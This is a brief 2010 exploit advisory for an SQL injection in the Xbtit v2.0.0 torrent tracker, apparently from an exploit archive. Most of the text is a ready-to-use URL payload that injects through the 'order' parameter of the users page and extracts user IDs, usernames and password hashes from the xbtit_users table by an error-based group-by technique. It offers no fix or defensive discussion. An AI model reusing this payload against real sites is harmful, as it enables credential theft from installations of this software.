Xbtit v2.0.0 SQL Injection Vulnerability
Posted on 13 March 2010
======================================== Xbtit v2.0.0 SQL Injection Vulnerability ======================================== #################################################### # Title : Xbtit SQL Injection Vulnerability # # Author : Ctacok # # Homepage : http://ctacok.ru/ # #################################################### #################################################### # Vulnerable File : /index.php?page=users&order=[SQL]&by=ASC #################################################### # ExploiT : /index.php?page=users&order=flag+or(1,1)=(select+count(0),concat((select+concat(0x3a3a3a,id,0x3a,username,0x3a,password,0x3a3a3a)+from+xbtit_users+limit+1,1),floor(rand(0)*2))from(information_schema.tables)group+by+2)--++&by=ASC #################################################### # ~ - [ [ : Inj3ct0r : ] ]
